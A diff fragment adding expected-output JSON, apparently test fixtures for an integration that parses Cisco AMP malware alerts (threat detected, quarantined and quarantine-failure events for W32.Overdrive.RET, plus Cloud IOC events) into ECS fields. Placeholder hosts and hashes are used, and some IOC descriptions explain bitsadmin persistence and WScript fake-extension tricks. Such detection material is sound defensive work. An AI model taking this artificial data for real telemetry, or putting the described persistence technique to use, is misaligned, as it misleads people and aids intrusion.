+                "hash": [
+                    "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850",
+                    "0fe5be3811a98ee6a9c997d3812d911a",
+                    "cf162622e29bca072d01b274fbbc3ceaacdd13c7"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Quarantined",
+                "hostname": "Demo_AMP_Threat_Quarantined",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:35.701339869Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241347137077000,\"timestamp\":1610618799,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-14T10:06:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241347137077251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"BIT657.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\BIT657.tmp\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\",\"sha1\":\"cf162622e29bca072d01b274fbbc3ceaacdd13c7\",\"md5\":\"0fe5be3811a98ee6a9c997d3812d911a\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533241347137077000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Overdrive.RET",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "24:78:d8:fd:c4:75",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "24:78:d8:fd:c4:75"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533241347137077251",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T10:06:39.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP_Threat_Quarantined"
+                ],
+                "hash": [
+                    "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Quarantined",
+                "hostname": "Demo_AMP_Threat_Quarantined"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:35.701341785Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241347137077000,\"timestamp\":1610618799,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-14T10:06:39+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6533241347137077251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6533241347137077000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "24:78:d8:fd:c4:75",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "24:78:d8:fd:c4:75"
+                        ]
+                    },
+                    "detection_id": "6533241347137077251",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T10:05:52.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP_Threat_Quarantined"
+                ],
+                "hash": [
+                    "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Quarantined",
+                "hostname": "Demo_AMP_Threat_Quarantined"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:35.701343742Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6533241145273614337\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6533241145273614000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "24:78:d8:fd:c4:75",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "24:78:d8:fd:c4:75"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6533241145273614337",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "svchost.exe",
+                "pid": 896,
+                "hash": {
+                    "sha1": "4af001b3c3816b860660cf2de2c0fd3c1dfb4878",
+                    "sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2",
+                    "md5": "54a47f6b5e09a77e61649109c6a08866"
+                }
+            },
+            "@timestamp": "2021-01-14T10:05:52.000Z",
+            "file": {
+                "name": "SqGGuYXyy.exe",
+                "path": "\\\\?\\C:\\SqGGuYXyy.exe",
+                "hash": {
+                    "sha1": "cf162622e29bca072d01b274fbbc3ceaacdd13c7",
+                    "sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850",
+                    "md5": "0fe5be3811a98ee6a9c997d3812d911a"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Quarantined"
+                ],
+                "hash": [
+                    "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850",
+                    "0fe5be3811a98ee6a9c997d3812d911a",
+                    "cf162622e29bca072d01b274fbbc3ceaacdd13c7"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Quarantined",
+                "hostname": "Demo_AMP_Threat_Quarantined",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:35.701345707Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":619000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241145273614338\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"SqGGuYXyy.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\SqGGuYXyy.exe\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\",\"sha1\":\"cf162622e29bca072d01b274fbbc3ceaacdd13c7\",\"md5\":\"0fe5be3811a98ee6a9c997d3812d911a\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533241145273614000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Overdrive.RET",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "24:78:d8:fd:c4:75",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "24:78:d8:fd:c4:75"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533241145273614338",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "svchost.exe",
+                "pid": 896,
+                "hash": {
+                    "sha1": "4af001b3c3816b860660cf2de2c0fd3c1dfb4878",
+                    "sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2",
+                    "md5": "54a47f6b5e09a77e61649109c6a08866"
+                }
+            },
+            "@timestamp": "2021-01-14T10:05:52.000Z",
+            "file": {
+                "name": "BIT4BBF.tmp",
+                "path": "\\\\?\\C:\\BIT4BBF.tmp",
+                "hash": {
+                    "sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Quarantined"
+                ],
+                "hash": [
+                    "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Quarantined",
+                "hostname": "Demo_AMP_Threat_Quarantined",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:35.701347645Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241145273614337\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"BIT4BBF.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\BIT4BBF.tmp\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533241145273614000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Overdrive.RET",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "24:78:d8:fd:c4:75",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "24:78:d8:fd:c4:75"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533241145273614337",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T10:05:52.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP_Threat_Quarantined"
+                ],
+                "hash": [
+                    "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Quarantined",
+                "hostname": "Demo_AMP_Threat_Quarantined"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:35.701349558Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":619000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6533241145273614338\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6533241145273614000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "24:78:d8:fd:c4:75",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "24:78:d8:fd:c4:75"
+                        ]
+                    },
+                    "detection_id": "6533241145273614338",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "hash": {
+                    "sha256": "0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"
+                }
+            },
+            "@timestamp": "2021-01-14T10:05:50.000Z",
+            "file": {
+                "name": "WScript.exe",
+                "path": "/C:/Windows/System32/WScript.exe",
+                "hash": {
+                    "sha256": "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP_Threat_Quarantined"
+                ],
+                "hash": [
+                    "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Quarantined",
+                "hostname": "Demo_AMP_Threat_Quarantined"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:35.701351457Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739875754000,\"timestamp\":1610618750,\"timestamp_nanoseconds\":875739000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.\",\"short_description\":\"W32.WScriptExecuteFakeExtension.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WScript.exe\",\"file_path\":\"/C:/Windows/System32/WScript.exe\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}}}}",
+                "kind": "alert",
+                "start": "2021-01-14T10:05:50.000Z",
+                "action": "Cloud IOC",
+                "id": "1521138739875754000",
+                "category": [
+                    "file"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "24:78:d8:fd:c4:75",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Clean",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "24:78:d8:fd:c4:75"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "cloud_ioc": {
+                        "short_description": "W32.WScriptExecuteFakeExtension.ioc",
+                        "description": "The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it."
+                    },
+                    "event_type_id": 1107296274
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "hash": {
+                    "sha256": "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"
+                }
+            },
+            "@timestamp": "2021-01-14T10:05:50.000Z",
+            "file": {
+                "name": "bitsadmin.exe",
+                "path": "/C:/Windows/System32/bitsadmin.exe",
+                "hash": {
+                    "sha256": "838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP_Threat_Quarantined"
+                ],
+                "hash": [
+                    "838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Quarantined",
+                "hostname": "Demo_AMP_Threat_Quarantined"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:35.701353384Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739868158500,\"timestamp\":1610618750,\"timestamp_nanoseconds\":868146000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.\",\"short_description\":\"W32.Bitsadmin.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"bitsadmin.exe\",\"file_path\":\"/C:/Windows/System32/bitsadmin.exe\",\"identity\":{\"sha256\":\"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"}}}}}",
+                "kind": "alert",
+                "start": "2021-01-14T10:05:50.000Z",
+                "action": "Cloud IOC",
+                "id": "1521138739868158500",
+                "category": [
+                    "file"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "24:78:d8:fd:c4:75",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Clean",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "24:78:d8:fd:c4:75"
+                        ]
+                    },
